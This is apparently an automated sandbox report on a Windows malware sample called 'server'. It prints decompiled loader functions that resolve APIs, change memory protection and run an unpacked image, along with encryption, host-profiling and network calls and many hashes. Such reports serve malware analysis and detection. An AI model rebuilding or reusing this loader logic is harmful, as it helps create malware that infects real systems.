            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0040139F() {
            				char _v16;
            				intOrPtr _v28;
            				void _v32;
            				void* _v36;
            				intOrPtr _t15;
            				void* _t16;
            				void* _t24;
            				long _t25;
            				int _t26;
            				void* _t30;
            				intOrPtr* _t32;
            				signed int _t35;
            				intOrPtr _t38;
            
            				_t15 =  *0x404184;
            				if( *0x40416c > 5) {
            					_t16 = _t15 + 0x40513c;
            				} else {
            					_t16 = _t15 + 0x40529c;
            				}
            				E00401D3C(_t16, _t16);
            				_t35 = 6;
            				memset( &_v32, 0, _t35 << 2);
            				_t24 = E00401882( &_v32,  &_v16,  *0x404180 ^ 0xdd0210cf); // executed
            				if(_t24 == 0) {
            					_t25 = 0xb;
            				} else {
            					_t26 = lstrlenW( *0x404178);
            					_t8 = _t26 + 2; // 0x2
            					_t11 = _t26 + _t8 + 8; // 0xa
            					_t30 = E004015B0(_t38, _t11,  &_v32,  &_v36); // executed
            					if(_t30 == 0) {
            						_t32 = _v36;
            						 *_t32 = 0;
            						if( *0x404178 == 0) {
            							 *((short*)(_t32 + 4)) = 0;
            						} else {
            							L00401FE6(_t32 + 4);
            						}
            					}
            					_t25 = E004012FB(_v28); // executed
            				}
            				ExitThread(_t25);
            			}
















            0x004013a5
            0x004013b6
            0x004013c0
            0x004013b8
            0x004013b8
            0x004013b8
            0x004013c7
            0x004013d0
            0x004013d5
            0x004013ec
            0x004013f3
            0x00401450
            0x004013f5
            0x004013fb
            0x00401401
            0x0040140f
            0x00401413
            0x0040141a
            0x00401422
            0x00401426
            0x0040142e
            0x0040143f
            0x00401430
            0x00401436
            0x00401436
            0x0040142e
            0x00401447
            0x00401447
            0x00401452

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.565231454.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.565231454.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.565231454.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.565231454.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: ExitThreadlstrlen
            • String ID:
            • API String ID: 2636182767-0
            • Opcode ID: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
            • Instruction ID: 2b8b17c81bcefa181eed95ac27ced154ec6146dfe98fb58ff2424010aaaeeb75
            • Opcode Fuzzy Hash: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
            • Instruction Fuzzy Hash: A511E271504205ABE700EB61DD48E5B77ECAF84314F00493BB941F72B1EB38EA448B5A
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
              • Part of subcall function 00572839: SysFreeString.OLEAUT32(00000000), ref: 0057289C
            • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,00579038,?,00000000,?,00000000,?,0057528E,?,?,00AF5FB8,00000000,?), ref: 00573454
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: Free$HeapString
            • String ID: Uhv
            • API String ID: 3806048269-4282624479
            • Opcode ID: f8c8d9153e25730714c4c1e7f4925d7bdc78c44feb557c6a56fbc7cbb0e7d111
            • Instruction ID: 57fb72dda69b5c2e8ea7170ba072b5c99160e0a0e610b8ffc674aa35e7e4838b
            • Opcode Fuzzy Hash: f8c8d9153e25730714c4c1e7f4925d7bdc78c44feb557c6a56fbc7cbb0e7d111
            • Instruction Fuzzy Hash: 03011632500619BBCF229F55EC09EAA3F66FF54760F04C024BE099A121E7719A60FB90
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetComputerNameExA.KERNEL32(00000003,00000000,00573DCD,00000000,00000000,?,0057A134,00573DCD), ref: 00574747
              • Part of subcall function 005733DC: RtlAllocateHeap.NTDLL(00000000,00000000,0057119A), ref: 005733E8
            • GetComputerNameExA.KERNEL32(00000003,00000000,00573DCD,00573DCE,?,0057A134,00573DCD), ref: 00574764
              • Part of subcall function 005761DA: RtlFreeHeap.NTDLL(00000000,00000000,005711EA,?,00000000,00000001), ref: 005761E6
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: ComputerHeapName$AllocateFree
            • String ID:
            • API String ID: 187446995-0
            • Opcode ID: f59986dd516e7f55b419e3425f04b606ed2054275f9608291c75eefd39a5bee9
            • Instruction ID: ad1a9a45c5024d29b22817ba31f16dbadfa936667fdad45f6d970245b6829396
            • Opcode Fuzzy Hash: f59986dd516e7f55b419e3425f04b606ed2054275f9608291c75eefd39a5bee9
            • Instruction Fuzzy Hash: 27F0B43660011AFEEB12D6AAAC05EAF3AECEBD6754F504055E908D3140EB70DE02AA70
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • HeapCreate.KERNEL32(00000000,00400000,00000000,0057107E,?), ref: 0057500F
            • GetTickCount.KERNEL32 ref: 00575023
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: CountCreateHeapTick
            • String ID:
            • API String ID: 2177101570-0
            • Opcode ID: be88167718511d053e35488d43917f032284533bde1e9705b2890dffd52668d4
            • Instruction ID: 7cf84d5ae24691d280f98d6705fb140dba6740b43631f7cd46b43bf6796222f7
            • Opcode Fuzzy Hash: be88167718511d053e35488d43917f032284533bde1e9705b2890dffd52668d4
            • Instruction Fuzzy Hash: E9F06530540B0296EB212F71BC1DB193E90BBA4705F50C415F90DD4092FBB1D888FA61
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • InternetCloseHandle.WININET(?,?,00572248,?,?), ref: 00574C1A
              • Part of subcall function 005716B2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,?), ref: 005716CD
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: CloseHandleInternetMultipleObjectsWait
            • String ID:
            • API String ID: 2634508476-0
            • Opcode ID: 3ae7b605caf9f7c58168cb43d50eca0de59f0d09d12c3acbb439588a4055392d
            • Instruction ID: a3bbda579e41b10d4026112e5532f926759131205367bf976d6223d4fb385663
            • Opcode Fuzzy Hash: 3ae7b605caf9f7c58168cb43d50eca0de59f0d09d12c3acbb439588a4055392d
            • Instruction Fuzzy Hash: AF110076601A585BC631AFAAFD88C1BBBEDBB443043558D18F04DD3A11C724FC85AA64
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • RtlAllocateHeap.NTDLL(00000008,?), ref: 00410A99
            Memory Dump Source
            • Source File: 00000000.00000002.565263957.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_40f000_server.jbxd
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 6a604cc55b24e7e27b8ccc77388f352908695bbe9ee02af2659fcf074270eb92
            • Instruction ID: 854cbe174d6155709f2de1cc6b2fb78cf8e22d039f7b5935ced02df6ed00bef1
            • Opcode Fuzzy Hash: 6a604cc55b24e7e27b8ccc77388f352908695bbe9ee02af2659fcf074270eb92
            • Instruction Fuzzy Hash: 7A01B1322013159FEB289F25DC44BAB3764EFA17A0F05852BE8559A2D0DBB89CC0C798
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
              • Part of subcall function 0057661C: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00574B72,?,00000000,?), ref: 00576625
              • Part of subcall function 0057661C: memcpy.NTDLL(00000000,?,?,?,00000002,?,?,00574B72,?,00000000,?), ref: 0057664F
              • Part of subcall function 0057661C: memset.NTDLL ref: 00576663
            • SysFreeString.OLEAUT32(00000000), ref: 0057289C
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: FreeStringlstrlenmemcpymemset
            • String ID:
            • API String ID: 1945096531-0
            • Opcode ID: 33c572c67a494dd607d7c4fb12e06b0ad433ad31bb35e9d2f2c66c955aa6de15
            • Instruction ID: a69bdda3cabeebf60938fa69316dfb9d32defa1f24d310c1c2630e975f8cdab7
            • Opcode Fuzzy Hash: 33c572c67a494dd607d7c4fb12e06b0ad433ad31bb35e9d2f2c66c955aa6de15
            • Instruction Fuzzy Hash: B001BC3250021ABFDB019FA9EC48AAEBFB8FF44340F008825F909E3161E7729D51E791
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 37%
            			E00401D3C(void* __eax, intOrPtr _a4) {
            
            				 *0x404190 =  *0x404190 & 0x00000000;
            				_push(0);
            				_push(0x40418c);
            				_push(1);
            				_push(_a4);
            				 *0x404188 = 0xc; // executed
            				L00401682(); // executed
            				return __eax;
            			}



            0x00401d3c
            0x00401d43
            0x00401d45
            0x00401d4a
            0x00401d4c
            0x00401d50
            0x00401d5a
            0x00401d5f

            APIs
            • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(004013CC,00000001,0040418C,00000000), ref: 00401D5A
            Memory Dump Source
            • Source File: 00000000.00000002.565231454.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.565231454.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.565231454.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.565231454.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: DescriptorSecurity$ConvertString
            • String ID:
            • API String ID: 3907675253-0
            • Opcode ID: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
            • Instruction ID: 8b1a9882f0f7b6f5a619b3d6300b2bdd32795284b236dc0e31706888a106ff8d
            • Opcode Fuzzy Hash: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
            • Instruction Fuzzy Hash: AFC04CF4140300B7E620AB409D5AF057A5577A4715F61062DFB04391E1C3F91094952D
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E004012E6(long _a4) {
            				void* _t2;
            
            				_t2 = RtlAllocateHeap( *0x404160, 0, _a4); // executed
            				return _t2;
            			}




            0x004012f2
            0x004012f8

            APIs
            • RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
            Memory Dump Source
            • Source File: 00000000.00000002.565231454.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.565231454.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.565231454.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.565231454.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
            • Instruction ID: e72f98105ba7c706faca8ef9926cddb4ff6cd2f9e0c1ce1923eff6ceed1ee1be
            • Opcode Fuzzy Hash: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
            • Instruction Fuzzy Hash: 92B012B1100100ABCA118F11EF08F06BE31B7E4701F004030B3042407482314C20FB1D
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00401BA9(void* _a4) {
            				char _t2;
            
            				_t2 = RtlFreeHeap( *0x404160, 0, _a4); // executed
            				return _t2;
            			}




            0x00401bb5
            0x00401bbb

            APIs
            • RtlFreeHeap.NTDLL(00000000,00000030,004017ED,00000000,00000030,00000000,00000000,00000030,?,?,?,?,?,00401A66), ref: 00401BB5
            Memory Dump Source
            • Source File: 00000000.00000002.565231454.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.565231454.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.565231454.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.565231454.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: FreeHeap
            • String ID:
            • API String ID: 3298025750-0
            • Opcode ID: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
            • Instruction ID: ce698fd0423bda5088509b7a42681047dd9c8e559710f82c1ef419a06116bbed
            • Opcode Fuzzy Hash: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
            • Instruction Fuzzy Hash: 8AB01271000100BBCA118F10EF08F067F21B7E4701F008030B3046407482314D60FB0C
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 86%
            			E004012FB(void* __eax) {
            				char _v8;
            				void* _v12;
            				void* __edi;
            				void* _t18;
            				long _t24;
            				long _t26;
            				long _t29;
            				intOrPtr _t40;
            				void* _t41;
            				void* _t42;
            				void* _t44;
            
            				_t41 = __eax;
            				_t16 =  *0x404180;
            				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4);
            				_t18 = E00401202( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4), _t16 + 0xbce8a57d,  &_v8,  &_v12); // executed
            				if(_t18 != 0) {
            					_t29 = 8;
            					goto L8;
            				} else {
            					_t40 = _v8;
            					_t29 = E00401BC4(_t33, _t40, _t41);
            					if(_t29 == 0) {
            						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
            						_t24 = E00401000(_t40, _t44); // executed
            						_t29 = _t24;
            						if(_t29 == 0) {
            							_t26 = E004014CF(_t44, _t40); // executed
            							_t29 = _t26;
            							if(_t29 == 0) {
            								_push(_t26);
            								_push(1);
            								_push(_t40);
            								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
            									_t29 = GetLastError();
            								}
            							}
            						}
            					}
            					_t42 = _v12;
            					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
            					E00401BA9(_t42);
            					L8:
            					return _t29;
            				}
            			}














            0x00401303
            0x00401305
            0x00401321
            0x00401332
            0x00401339
            0x00401397
            0x00000000
            0x0040133b
            0x0040133b
            0x00401345
            0x00401349
            0x0040134e
            0x00401351
            0x00401356
            0x0040135a
            0x0040135f
            0x00401364
            0x00401368
            0x0040136d
            0x0040136e
            0x00401372
            0x00401377
            0x0040137f
            0x0040137f
            0x00401377
            0x00401368
            0x0040135a
            0x00401381
            0x0040138a
            0x0040138e
            0x00401398
            0x0040139e
            0x0040139e

            APIs
              • Part of subcall function 00401202: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401248
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401274
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
              • Part of subcall function 00401000: LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 00401038
              • Part of subcall function 004014CF: VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
              • Part of subcall function 004014CF: VirtualProtect.KERNEL32(00000000,?,?,?), ref: 0040157D
              • Part of subcall function 004014CF: GetLastError.KERNEL32 ref: 00401583
            • GetLastError.KERNEL32(?,?), ref: 00401379
            Memory Dump Source
            • Source File: 00000000.00000002.565231454.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.565231454.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.565231454.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.565231454.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
            • String ID:
            • API String ID: 3135819546-0
            • Opcode ID: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
            • Instruction ID: 9c7335bcc5d41c3ee7976e84fb0b4f56712358cbe666051dfec51b4dde3629c0
            • Opcode Fuzzy Hash: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
            • Instruction Fuzzy Hash: 8B11E976600301ABD711ABA68C85DAB77BCAF98318704017EFD01B7A91EA74ED068798
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • lstrlen.KERNEL32(00000000,00000000,00573ECE,00000000,?,005766D9,00000000,00573ECE,?,0057A134,00573ECE,00000000,0057A3CC), ref: 00575074
              • Part of subcall function 00571508: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000), ref: 00571540
              • Part of subcall function 00571508: memcpy.NTDLL(?,?,00000010), ref: 00571559
              • Part of subcall function 00571508: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,?), ref: 00571582
              • Part of subcall function 00571508: CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 0057159A
              • Part of subcall function 00571508: memcpy.NTDLL(00000000,?,?,?), ref: 005715EC
              • Part of subcall function 005733DC: RtlAllocateHeap.NTDLL(00000000,00000000,0057119A), ref: 005733E8
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
            • String ID:
            • API String ID: 894908221-0
            • Opcode ID: 85c44f33db44f05182f49b74282bfc07a711a0aa8f9d2ce4054f7ae0a05d3d12
            • Instruction ID: 77b81a124725a1911aa570d767b8b71a6d6c84d43f55a5de44487de1ea3abf9e
            • Opcode Fuzzy Hash: 85c44f33db44f05182f49b74282bfc07a711a0aa8f9d2ce4054f7ae0a05d3d12
            • Instruction Fuzzy Hash: 1AF03A36100519BACF11AE65EC09CDA3FADFFC4360B00C022FD0D8A111DA71DA55ABA0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000), ref: 00571540
            • memcpy.NTDLL(?,?,00000010), ref: 00571559
            • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,?), ref: 00571582
            • CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 0057159A
            • memcpy.NTDLL(00000000,?,?,?), ref: 005715EC
            • CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,?,00000020,?,?,?), ref: 00571615
            • GetLastError.KERNEL32(?,?,?), ref: 00571644
            • GetLastError.KERNEL32 ref: 00571676
            • CryptDestroyKey.ADVAPI32(?), ref: 00571682
            • GetLastError.KERNEL32 ref: 0057168A
            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00571697
            • GetLastError.KERNEL32 ref: 0057169F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
            • String ID: @MhvNhv
            • API String ID: 3401600162-713089056
            • Opcode ID: 269ca196aecd5de2812781e54961a8a18f406352a1b55e33cb9751bb8668495c
            • Instruction ID: 7fabbe18239c1035a2622777ffc2be4ee5caa581e7e34587a79cc900d9f81394
            • Opcode Fuzzy Hash: 269ca196aecd5de2812781e54961a8a18f406352a1b55e33cb9751bb8668495c
            • Instruction Fuzzy Hash: 6C517BB1900209EFDB10DFA8EC88AAE7FB9FB54340F148829F919E6150D7708E54EB25
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00401D68() {
            				void* _t1;
            				unsigned int _t3;
            				void* _t4;
            				long _t5;
            				void* _t6;
            				intOrPtr _t10;
            				void* _t14;
            
            				_t10 =  *0x404170;
            				_t1 = CreateEventA(0, 1, 0, 0);
            				 *0x40417c = _t1;
            				if(_t1 == 0) {
            					return GetLastError();
            				}
            				_t3 = GetVersion();
            				if(_t3 != 5) {
            					L4:
            					if(_t14 <= 0) {
            						_t4 = 0x32;
            						return _t4;
            					} else {
            						goto L5;
            					}
            				} else {
            					if(_t3 >> 8 > 0) {
            						L5:
            						 *0x40416c = _t3;
            						_t5 = GetCurrentProcessId();
            						 *0x404168 = _t5;
            						 *0x404170 = _t10;
            						_t6 = OpenProcess(0x10047a, 0, _t5);
            						 *0x404164 = _t6;
            						if(_t6 == 0) {
            							 *0x404164 =  *0x404164 | 0xffffffff;
            						}
            						return 0;
            					} else {
            						_t14 = _t3 - _t3;
            						goto L4;
            					}
            				}
            			}










            0x00401d69
            0x00401d77
            0x00401d7d
            0x00401d84
            0x00401ddb
            0x00401ddb
            0x00401d86
            0x00401d8e
            0x00401d9b
            0x00401d9b
            0x00401dd7
            0x00401dd9
            0x00000000
            0x00000000
            0x00000000
            0x00401d90
            0x00401d97
            0x00401d9d
            0x00401d9d
            0x00401da2
            0x00401db0
            0x00401db5
            0x00401dbb
            0x00401dc1
            0x00401dc8
            0x00401dca
            0x00401dca
            0x00401dd4
            0x00401d99
            0x00401d99
            0x00000000
            0x00401d99
            0x00401d97

            APIs
            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
            • GetVersion.KERNEL32 ref: 00401D86
            • GetCurrentProcessId.KERNEL32 ref: 00401DA2
            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
            Memory Dump Source
            • Source File: 00000000.00000002.565231454.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.565231454.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.565231454.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.565231454.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: Process$CreateCurrentEventOpenVersion
            • String ID:
            • API String ID: 845504543-0
            • Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
            • Instruction ID: a5005e0615366c288a960c89f9170266babf83a3c5a8d8e9540ac284067a1926
            • Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
            • Instruction Fuzzy Hash: 79F0AFB05813009BE7509F78BE0DB563F64AB95712F000036E601FA2F8D7709982CB5C
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • HeapFree.KERNEL32(00000000,?), ref: 00572028
            • HeapFree.KERNEL32(00000000,?), ref: 0057203C
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: FreeHeap
            • String ID: Uhv
            • API String ID: 3298025750-4282624479
            • Opcode ID: 6a852b7d1f8ae5ed36707791cacf16a1e0044d617434b2ba7eb9936f3c5d30be
            • Instruction ID: fe7a3a5ed036e6b8a519b91256b4dcc7209aabc0d88e33a6ab3027e14597a1ba
            • Opcode Fuzzy Hash: 6a852b7d1f8ae5ed36707791cacf16a1e0044d617434b2ba7eb9936f3c5d30be
            • Instruction Fuzzy Hash: D281C2B0A10904ABD710DFB8BD88D6F7EADBB987007248D25E80DD7215EB35DD88B725
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: memset
            • String ID:
            • API String ID: 2221118986-0
            • Opcode ID: 11a79081a1c7cac4cdb29fe9188db1baee97a707cc2590aeb8492f870be3d651
            • Instruction ID: 1561b3b65c28de6e1ef026d0d301eadf43a2356f75ad26ae92928d356a600606
            • Opcode Fuzzy Hash: 11a79081a1c7cac4cdb29fe9188db1baee97a707cc2590aeb8492f870be3d651
            • Instruction Fuzzy Hash: E222847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.565263957.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_40f000_server.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
            • Instruction ID: 6a61aaf81cceb962ac43e89968d19062db41915cb31680b98768ff6a35e7641c
            • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
            • Instruction Fuzzy Hash: B4C1B373D5E5F3058B35492D05182BFEE626E81B4231FC3D2DCD43F289C22A6EA696D4
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.565263957.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_40f000_server.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
            • Instruction ID: 210b0bbc6fa7648ea2dec32900c8f8778a93b69b975d2da7577560c404c6e586
            • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
            • Instruction Fuzzy Hash: 0AC1D473D5A5F30587354A2D05182BBEEA16E81B4131FC392DCD43F389C22A6EA6D6D4
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.565263957.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_40f000_server.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
            • Instruction ID: 5199c5bc16864de70c6dcf7905d63cf28dc46ea8416786d032595d3cba67f2f8
            • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
            • Instruction Fuzzy Hash: 5AC1E533D5E5F3058B36492D05182BFEE626E81B4531FC3D2CCD43F689C62A6EA685D4
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.565263957.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_40f000_server.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
            • Instruction ID: a2b0026a64bfaf7b2cdf986373f4502d60de115db649975ff53bd1799c231f25
            • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
